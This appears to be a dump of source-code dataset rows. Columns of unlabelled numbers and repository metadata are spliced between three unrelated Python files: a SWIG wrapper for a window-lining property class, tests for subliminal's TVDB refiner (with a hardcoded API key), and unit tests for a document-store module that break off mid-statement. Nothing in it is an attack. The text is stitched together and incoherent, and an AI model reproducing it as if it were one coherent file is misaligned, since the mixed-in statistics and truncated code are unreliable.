| 0.728295
| 969
| 7,913
| 5.723426
| 0.154799
| 0.04057
| 0.074648
| 0.073567
| 0.845835
| 0.816985
| 0.76722
| 0.727191
| 0.705914
| 0.687523
| 0
| 0.032016
| 0.159232
| 7,913
| 122
| 169
| 64.860656
| 0.801593
| 0.029192
| 0
| 0.457143
| 0
| 0.019048
| 0.330989
| 0.153966
| 0
| 0
| 0
| 0
| 0.352381
| 1
| 0.152381
| false
| 0.047619
| 0.028571
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b2e78a69de6fc2be7c4e9fe169690ca194efddff
| 57
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_0/__init__.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_0/__init__.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_1/_pkg0_1_0/_pkg0_1_0_0/__init__.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
from ._pkg0_1_0_0_0 import *
from ._pkg0_1_0_0_1 import *
| 28.5
| 28
| 0.807018
| 14
| 57
| 2.571429
| 0.357143
| 0.166667
| 0.5
| 0.555556
| 0.611111
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0.122807
| 57
| 2
| 29
| 28.5
| 0.52
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
65097c30e1205d3034b5c43cf99668a38c509448
| 12,340
|
py
|
Python
|
SimModel_Python_API/simmodel_swig/Release/SimWindowLiningProps_WindowLiningProps_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | 3
|
2016-05-30T15:12:16.000Z
|
2022-03-22T08:11:13.000Z
|
SimModel_Python_API/simmodel_swig/Release/SimWindowLiningProps_WindowLiningProps_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | 21
|
2016-06-13T11:33:45.000Z
|
2017-05-23T09:46:52.000Z
|
SimModel_Python_API/simmodel_swig/Release/SimWindowLiningProps_WindowLiningProps_Default.py
|
EnEff-BIM/EnEffBIM-Framework
|
6328d39b498dc4065a60b5cc9370b8c2a9a1cddf
|
[
"MIT"
] | null | null | null |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.7
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_SimWindowLiningProps_WindowLiningProps_Default', [dirname(__file__)])
except ImportError:
import _SimWindowLiningProps_WindowLiningProps_Default
return _SimWindowLiningProps_WindowLiningProps_Default
if fp is not None:
try:
_mod = imp.load_module('_SimWindowLiningProps_WindowLiningProps_Default', fp, pathname, description)
finally:
fp.close()
return _mod
_SimWindowLiningProps_WindowLiningProps_Default = swig_import_helper()
del swig_import_helper
else:
import _SimWindowLiningProps_WindowLiningProps_Default
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
try:
import weakref
weakref_proxy = weakref.proxy
except:
weakref_proxy = lambda x: x
import base
class SimWindowLiningProps(base.SimPropertySetDefinition):
__swig_setmethods__ = {}
for _s in [base.SimPropertySetDefinition]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimWindowLiningProps, name, value)
__swig_getmethods__ = {}
for _s in [base.SimPropertySetDefinition]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimWindowLiningProps, name)
__repr__ = _swig_repr
def LiningDepth(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_LiningDepth(self, *args)
def LiningThickness(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_LiningThickness(self, *args)
def TransomThickness(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_TransomThickness(self, *args)
def MullionThickness(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_MullionThickness(self, *args)
def FirstTransomOffset(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_FirstTransomOffset(self, *args)
def SecondTransomOffset(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_SecondTransomOffset(self, *args)
def FirstMullionOffset(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_FirstMullionOffset(self, *args)
def SecondMullionOffset(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_SecondMullionOffset(self, *args)
def ShapeAspectStyle(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_ShapeAspectStyle(self, *args)
def __init__(self, *args):
this = _SimWindowLiningProps_WindowLiningProps_Default.new_SimWindowLiningProps(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps__clone(self, f, c)
__swig_destroy__ = _SimWindowLiningProps_WindowLiningProps_Default.delete_SimWindowLiningProps
__del__ = lambda self: None
SimWindowLiningProps_swigregister = _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_swigregister
SimWindowLiningProps_swigregister(SimWindowLiningProps)
class SimWindowLiningProps_WindowLiningProps(SimWindowLiningProps):
__swig_setmethods__ = {}
for _s in [SimWindowLiningProps]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimWindowLiningProps_WindowLiningProps, name, value)
__swig_getmethods__ = {}
for _s in [SimWindowLiningProps]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimWindowLiningProps_WindowLiningProps, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimWindowLiningProps_WindowLiningProps_Default.new_SimWindowLiningProps_WindowLiningProps(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps__clone(self, f, c)
__swig_destroy__ = _SimWindowLiningProps_WindowLiningProps_Default.delete_SimWindowLiningProps_WindowLiningProps
__del__ = lambda self: None
SimWindowLiningProps_WindowLiningProps_swigregister = _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_swigregister
SimWindowLiningProps_WindowLiningProps_swigregister(SimWindowLiningProps_WindowLiningProps)
class SimWindowLiningProps_WindowLiningProps_Default(SimWindowLiningProps_WindowLiningProps):
__swig_setmethods__ = {}
for _s in [SimWindowLiningProps_WindowLiningProps]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimWindowLiningProps_WindowLiningProps_Default, name, value)
__swig_getmethods__ = {}
for _s in [SimWindowLiningProps_WindowLiningProps]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimWindowLiningProps_WindowLiningProps_Default, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimWindowLiningProps_WindowLiningProps_Default.new_SimWindowLiningProps_WindowLiningProps_Default(*args)
try:
self.this.append(this)
except:
self.this = this
def _clone(self, f=0, c=None):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default__clone(self, f, c)
__swig_destroy__ = _SimWindowLiningProps_WindowLiningProps_Default.delete_SimWindowLiningProps_WindowLiningProps_Default
__del__ = lambda self: None
SimWindowLiningProps_WindowLiningProps_Default_swigregister = _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_swigregister
SimWindowLiningProps_WindowLiningProps_Default_swigregister(SimWindowLiningProps_WindowLiningProps_Default)
class SimWindowLiningProps_WindowLiningProps_Default_sequence(base.sequence_common):
__swig_setmethods__ = {}
for _s in [base.sequence_common]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, SimWindowLiningProps_WindowLiningProps_Default_sequence, name, value)
__swig_getmethods__ = {}
for _s in [base.sequence_common]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, SimWindowLiningProps_WindowLiningProps_Default_sequence, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _SimWindowLiningProps_WindowLiningProps_Default.new_SimWindowLiningProps_WindowLiningProps_Default_sequence(*args)
try:
self.this.append(this)
except:
self.this = this
def assign(self, n, x):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_assign(self, n, x)
def begin(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_begin(self, *args)
def end(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_end(self, *args)
def rbegin(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_rbegin(self, *args)
def rend(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_rend(self, *args)
def at(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_at(self, *args)
def front(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_front(self, *args)
def back(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_back(self, *args)
def push_back(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_push_back(self, *args)
def pop_back(self):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_pop_back(self)
def detach_back(self, pop=True):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_detach_back(self, pop)
def insert(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_insert(self, *args)
def erase(self, *args):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_erase(self, *args)
def detach(self, position, r, erase=True):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_detach(self, position, r, erase)
def swap(self, x):
return _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_swap(self, x)
__swig_destroy__ = _SimWindowLiningProps_WindowLiningProps_Default.delete_SimWindowLiningProps_WindowLiningProps_Default_sequence
__del__ = lambda self: None
SimWindowLiningProps_WindowLiningProps_Default_sequence_swigregister = _SimWindowLiningProps_WindowLiningProps_Default.SimWindowLiningProps_WindowLiningProps_Default_sequence_swigregister
SimWindowLiningProps_WindowLiningProps_Default_sequence_swigregister(SimWindowLiningProps_WindowLiningProps_Default_sequence)
# This file is compatible with both classic and new-style classes.
| 45.201465
| 187
| 0.774716
| 1,177
| 12,340
| 7.558199
| 0.129992
| 0.382644
| 0.390737
| 0.230216
| 0.728417
| 0.68424
| 0.643435
| 0.518323
| 0.458746
| 0.394447
| 0
| 0.001633
| 0.156402
| 12,340
| 272
| 188
| 45.367647
| 0.85293
| 0.023825
| 0
| 0.37619
| 1
| 0
| 0.027252
| 0.00781
| 0
| 0
| 0
| 0
| 0
| 1
| 0.17619
| false
| 0.009524
| 0.052381
| 0.138095
| 0.566667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
65467e19011fcc02b1dcab797dc65337f2d1d443
| 13,316
|
py
|
Python
|
tests/test_tvdb.py
|
eSoares/subliminal
|
e25589dbcc5b2455bf9f0b49cf2083bb0eae449f
|
[
"MIT"
] | 1,838
|
2015-01-01T16:48:32.000Z
|
2022-03-31T16:22:36.000Z
|
tests/test_tvdb.py
|
eSoares/subliminal
|
e25589dbcc5b2455bf9f0b49cf2083bb0eae449f
|
[
"MIT"
] | 650
|
2015-01-04T23:13:51.000Z
|
2022-03-13T19:45:56.000Z
|
tests/test_tvdb.py
|
eSoares/subliminal
|
e25589dbcc5b2455bf9f0b49cf2083bb0eae449f
|
[
"MIT"
] | 327
|
2015-01-04T20:17:32.000Z
|
2022-03-15T10:52:23.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
import os
import time
import pytest
import requests
from vcr import VCR
from subliminal import __short_version__
from subliminal.video import Episode
from subliminal.refiners.tvdb import TVDBClient, refine, series_re
vcr = VCR(path_transformer=lambda path: path + '.yaml',
record_mode=os.environ.get('VCR_RECORD_MODE', 'once'),
cassette_library_dir=os.path.realpath(os.path.join('tests', 'cassettes', 'tvdb')))
@pytest.fixture()
def client():
return TVDBClient('2AE5D1E42E7194B9', headers={'User-Agent': 'Subliminal/%s' % __short_version__})
def test_series_re_no_year():
groups = series_re.match('Series Name').groupdict()
assert groups['series'] == 'Series Name'
assert groups['year'] is None
def test_series_re_year_parenthesis():
groups = series_re.match('Series Name (2013)').groupdict()
assert groups['series'] == 'Series Name'
assert groups['year'] == '2013'
assert groups['country'] is None
def test_series_re_text_parenthesis():
groups = series_re.match('Series Name (Rock)').groupdict()
assert groups['series'] == 'Series Name (Rock)'
assert groups['year'] is None
assert groups['country'] is None
def test_series_re_text_unclosed_parenthesis():
groups = series_re.match('Series Name (2013').groupdict()
assert groups['series'] == 'Series Name (2013'
assert groups['year'] is None
assert groups['country'] is None
def test_series_re_country():
groups = series_re.match('Series Name (UK)').groupdict()
assert groups['series'] == 'Series Name'
assert groups['year'] is None
assert groups['country'] == 'UK'
def test_language():
client = TVDBClient()
assert 'Accept-Language' in client.session.headers
assert client.session.headers['Accept-Language'] == 'en'
assert client.language == 'en'
client.language = 'fr'
assert client.session.headers['Accept-Language'] == 'fr'
assert client.language == 'fr'
def test_session():
session = requests.Session()
client = TVDBClient(session=session)
assert client.session is session
def test_headers():
client = TVDBClient(headers={'X-Test': 'Value'})
assert 'X-Test' in client.session.headers
assert client.session.headers['X-Test'] == 'Value'
@pytest.mark.integration
@vcr.use_cassette
def test_login_error():
client = TVDBClient('1234', headers={'User-Agent': 'Subliminal/%s' % __short_version__})
with pytest.raises(requests.HTTPError):
client.login()
@pytest.mark.integration
@vcr.use_cassette
def test_login(client):
assert client.token is None
assert client.token_date <= datetime.utcnow() - timedelta(hours=1)
assert client.token_expired
client.login()
assert client.token is not None
assert client.token_date > datetime.utcnow() - timedelta(seconds=1)
assert client.token_expired is False
@pytest.mark.integration
@vcr.use_cassette
def test_token_needs_refresh(client, monkeypatch):
monkeypatch.setattr(client, 'refresh_token_every', timedelta(milliseconds=100))
assert client.token_needs_refresh
client.login()
assert not client.token_needs_refresh
time.sleep(0.5)
assert client.token_needs_refresh
@pytest.mark.integration
@vcr.use_cassette
def test_refresh_token(client):
client.login()
old_token = client.token
time.sleep(0.5)
client.refresh_token()
assert client.token != old_token
@pytest.mark.integration
@vcr.use_cassette
def test_search_series(client):
data = client.search_series('The Big Bang Theory')
assert len(data) == 1
series = data[0]
assert series['id'] == 80379
assert series['firstAired'] == '2007-09-24'
@pytest.mark.integration
@vcr.use_cassette
def test_search_series_wrong_name(client):
data = client.search_series('The Bing Bag Theory')
assert data is None
@pytest.mark.integration
@vcr.use_cassette
def test_search_series_no_parameter(client):
with pytest.raises(requests.HTTPError):
client.search_series()
@pytest.mark.integration
@vcr.use_cassette
def test_search_series_multiple_parameters(client):
with pytest.raises(requests.HTTPError):
client.search_series('The Big Bang Theory', 'tt0898266')
@pytest.mark.integration
@vcr.use_cassette
def test_get_series(client):
series = client.get_series(80379)
assert series['id'] == 80379
assert series['firstAired'] == '2007-09-24'
assert series['imdbId'] == 'tt0898266'
@pytest.mark.integration
@vcr.use_cassette
def test_get_series_wrong_id(client):
series = client.get_series(999999999)
assert series is None
@pytest.mark.integration
@vcr.use_cassette
def test_get_series_actors(client):
actors = client.get_series_actors(80379)
assert len(actors) == 8
assert 'Jim Parsons' in {a['name'] for a in actors}
@pytest.mark.integration
@vcr.use_cassette
def test_get_series_actors_wrong_id(client):
actors = client.get_series_actors(999999999)
assert actors is None
@pytest.mark.integration
@vcr.use_cassette
def test_get_series_episodes(client):
episodes_data = client.get_series_episodes(80379)
assert episodes_data['links']['first'] == 1
assert episodes_data['links']['last'] == 3
assert episodes_data['links']['next'] == 2
assert episodes_data['links']['prev'] is None
assert len(episodes_data['data']) == 100
@pytest.mark.integration
@vcr.use_cassette
def test_get_series_episodes_page(client):
episodes_data = client.get_series_episodes(80379, page=2)
assert episodes_data['links']['first'] == 1
assert episodes_data['links']['last'] == 3
assert episodes_data['links']['next'] == 3
assert episodes_data['links']['prev'] == 1
assert len(episodes_data['data']) == 100
@pytest.mark.integration
@vcr.use_cassette
def test_get_series_episodes_wrong_id(client):
episodes_data = client.get_series_episodes(999999999)
assert episodes_data is None
@pytest.mark.integration
@vcr.use_cassette
def test_get_series_episodes_wrong_page(client):
episodes_data = client.get_series_episodes(80379, page=10)
assert episodes_data is None
@pytest.mark.integration
@vcr.use_cassette
def test_query_series_episodes(client):
episodes_data = client.query_series_episodes(80379, aired_season=7, aired_episode=5)
assert episodes_data['links']['first'] == 1
assert episodes_data['links']['last'] == 1
assert episodes_data['links']['next'] is None
assert episodes_data['links']['prev'] is None
assert len(episodes_data['data']) == 1
assert episodes_data['data'][0]['episodeName'] == 'The Workplace Proximity'
@pytest.mark.integration
@vcr.use_cassette
def test_query_series_episodes_wrong_season(client):
episodes_data = client.query_series_episodes(80379, aired_season=99)
assert episodes_data is None
@pytest.mark.integration
@vcr.use_cassette
def test_refine(episodes):
video = episodes['bbt_s07e05']
episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode)
refine(episode)
assert episode.series == video.series
assert episode.year == video.year
assert episode.original_series == video.original_series
assert episode.title == video.title
assert episode.imdb_id == video.imdb_id
assert episode.series_imdb_id == video.series_imdb_id
assert episode.tvdb_id == video.tvdb_id
assert episode.series_tvdb_id == video.series_tvdb_id
@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_partial(episodes):
video = episodes['csi_s15e18']
episode = Episode(video.name.lower(), video.series.lower().split(':')[0], video.season, video.episode)
refine(episode)
assert episode.series == video.series
assert episode.year == video.year
assert episode.original_series == video.original_series
assert episode.title == video.title
assert episode.imdb_id == video.imdb_id
assert episode.series_imdb_id == video.series_imdb_id
assert episode.tvdb_id == video.tvdb_id
assert episode.series_tvdb_id == video.series_tvdb_id
@pytest.mark.integration
@vcr.use_cassette
def test_refine_ambiguous(episodes):
video = episodes['colony_s01e09']
episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode)
refine(episode)
assert episode.series == video.series
assert episode.year == video.year
assert episode.original_series == video.original_series
assert episode.title == video.title
assert episode.imdb_id == video.imdb_id
assert episode.series_imdb_id == video.series_imdb_id
assert episode.tvdb_id == video.tvdb_id
assert episode.series_tvdb_id == video.series_tvdb_id
@pytest.mark.integration
@vcr.use_cassette
def test_refine_ambiguous_2(episodes):
video = episodes['the_100_s03e09']
episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode)
refine(episode)
assert episode.series == video.series
assert episode.year == video.year
assert episode.original_series == video.original_series
assert episode.title == video.title
assert episode.imdb_id == video.imdb_id
assert episode.series_imdb_id == video.series_imdb_id
assert episode.tvdb_id == video.tvdb_id
assert episode.series_tvdb_id == video.series_tvdb_id
@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_year(episodes):
video = episodes['dallas_2012_s01e03']
episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode, year=video.year,
original_series=video.original_series)
refine(episode)
assert episode.series == video.series
assert episode.year == video.year
assert episode.original_series == video.original_series
assert episode.title == video.title
assert episode.imdb_id == video.imdb_id
assert episode.series_imdb_id == video.series_imdb_id
assert episode.tvdb_id == video.tvdb_id
assert episode.series_tvdb_id == video.series_tvdb_id
@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_no_year(episodes):
video = episodes['dallas_s01e03']
episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode)
refine(episode)
assert episode.series == video.series
assert episode.year == video.year
assert episode.original_series == video.original_series
assert episode.title == video.title
assert episode.imdb_id == video.imdb_id
assert episode.series_imdb_id == video.series_imdb_id
assert episode.tvdb_id == video.tvdb_id
assert episode.series_tvdb_id == video.series_tvdb_id
@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_alternative_series(episodes):
video = episodes['turn_s04e03']
episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode)
refine(episode)
assert episode.series == video.series
assert episode.year == video.year
assert episode.original_series == video.original_series
assert episode.title == video.title
assert episode.imdb_id == video.imdb_id
assert episode.series_imdb_id == video.series_imdb_id
assert episode.tvdb_id == video.tvdb_id
assert episode.series_tvdb_id == video.series_tvdb_id
assert episode.alternative_series == video.alternative_series
@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_with_comma(episodes):
video = episodes['alex_inc_s01e04']
episode = Episode.fromname(video.name)
refine(episode)
assert episode.series == video.series
assert episode.year == video.year
assert episode.original_series == video.original_series
assert episode.title == video.title
assert episode.imdb_id == video.imdb_id
assert episode.series_imdb_id == video.series_imdb_id
assert episode.tvdb_id == video.tvdb_id
assert episode.series_tvdb_id == video.series_tvdb_id
assert episode.alternative_series == video.alternative_series
@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_with_country(episodes):
video = episodes['shameless_us_s08e01']
episode = Episode.fromname(video.name)
refine(episode)
assert episode.series == video.series
assert episode.year == video.year
assert episode.original_series == video.original_series
assert episode.title == video.title
assert episode.imdb_id == video.imdb_id
assert episode.series_imdb_id == video.series_imdb_id
assert episode.tvdb_id == video.tvdb_id
assert episode.series_tvdb_id == video.series_tvdb_id
assert episode.alternative_series == video.alternative_series
@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_with_country_hoc_us(episodes):
video = episodes['house_of_cards_us_s06e01']
episode = Episode.fromname(video.name)
refine(episode)
assert episode.series == video.series
assert episode.year == video.year
assert episode.original_series == video.original_series
assert episode.title == video.title
assert episode.imdb_id == video.imdb_id
assert episode.series_imdb_id == video.series_imdb_id
assert episode.tvdb_id == video.tvdb_id
assert episode.series_tvdb_id == video.series_tvdb_id
assert episode.alternative_series == video.alternative_series
| 33.206983
| 109
| 0.740012
| 1,782
| 13,316
| 5.302469
| 0.10101
| 0.115568
| 0.053974
| 0.071119
| 0.813102
| 0.779765
| 0.746957
| 0.724839
| 0.684094
| 0.659752
| 0
| 0.019244
| 0.149294
| 13,316
| 400
| 110
| 33.29
| 0.814883
| 0.001577
| 0
| 0.60559
| 0
| 0
| 0.067028
| 0.001805
| 0
| 0
| 0
| 0
| 0.453416
| 1
| 0.114907
| false
| 0
| 0.02795
| 0.003106
| 0.145963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e8ef768e8dc5385677795f0f90f8794cf078f678
| 29,444
|
py
|
Python
|
tests/test_domain.py
|
robertatakenaka/document-store
|
0598394131ae8db03c28d98babaff201299de49b
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_domain.py
|
robertatakenaka/document-store
|
0598394131ae8db03c28d98babaff201299de49b
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_domain.py
|
robertatakenaka/document-store
|
0598394131ae8db03c28d98babaff201299de49b
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from unittest import mock
import functools
from copy import deepcopy
import datetime
from documentstore import domain, exceptions
SAMPLE_MANIFEST = {
"id": "0034-8910-rsp-48-2-0275",
"versions": [
{
"data": "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml",
"assets": {
"0034-8910-rsp-48-2-0275-gf01.gif": [
(
"2018-08-05T23:03:44.971230Z",
"/rawfiles/8e644999a8fa4/0034-8910-rsp-48-2-0275-gf01.gif",
),
(
"2018-08-05T23:08:41.590174Z",
"/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif",
),
]
},
"timestamp": "2018-08-05T23:02:29.392990Z",
},
{
"data": "/rawfiles/2d3ad9c6bc656/0034-8910-rsp-48-2-0275.xml",
"assets": {
"0034-8910-rsp-48-2-0275-gf01.gif": [
(
"2018-08-05T23:30:29.392995Z",
"/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif",
)
]
},
"timestamp": "2018-08-05T23:30:29.392990Z",
},
],
}
def fake_utcnow():
return "2018-08-05T22:33:49.795151Z"
class UnittestMixin:
def _assert_raises_with_message(self, type, message, func, *args):
try:
func(*args)
except type as exc:
self.assertEqual(str(exc), message)
else:
self.assertTrue(False)
new_bundle = functools.partial(domain.BundleManifest.new, now=fake_utcnow)
class DocumentTests(unittest.TestCase):
def make_one(self):
_manifest = deepcopy(SAMPLE_MANIFEST)
return domain.Document(manifest=_manifest)
def test_manifest_is_generated_on_init(self):
document = domain.Document(id="0034-8910-rsp-48-2-0275")
self.assertTrue(isinstance(document.manifest, dict))
def test_manifest_as_arg_on_init(self):
existing_manifest = {"id": "0034-8910-rsp-48-2-0275", "versions": []}
document = domain.Document(manifest=existing_manifest)
self.assertEqual(existing_manifest, document.manifest)
def test_manifest_with_unknown_schema_is_allowed(self):
existing_manifest = {"versions": []}
document = domain.Document(manifest=existing_manifest)
self.assertEqual(existing_manifest, document.manifest)
def test_missing_id_return_empty_string(self):
existing_manifest = {"versions": []}
document = domain.Document(manifest=existing_manifest)
self.assertEqual(document.id(), "")
def test_id(self):
document = domain.Document(id="0034-8910-rsp-48-2-0275")
self.assertEqual(document.id(), "0034-8910-rsp-48-2-0275")
def test_new_version_of_data(self):
document = self.make_one()
self.assertEqual(len(document.manifest["versions"]), 2)
document.new_version(
"/rawfiles/5e3ad9c6cd6b8/0034-8910-rsp-48-2-0275.xml",
assets_getter=lambda data_url, timeout: (None, []),
)
self.assertEqual(len(document.manifest["versions"]), 3)
def test_get_latest_version(self):
document = self.make_one()
latest = document.version()
self.assertEqual(
latest["data"], "/rawfiles/2d3ad9c6bc656/0034-8910-rsp-48-2-0275.xml"
)
def test_get_latest_version_when_there_isnt_any(self):
document = domain.Document(id="0034-8910-rsp-48-2-0275")
self.assertRaises(ValueError, lambda: document.version())
def test_get_oldest_version(self):
document = self.make_one()
oldest = document.version(0)
self.assertEqual(
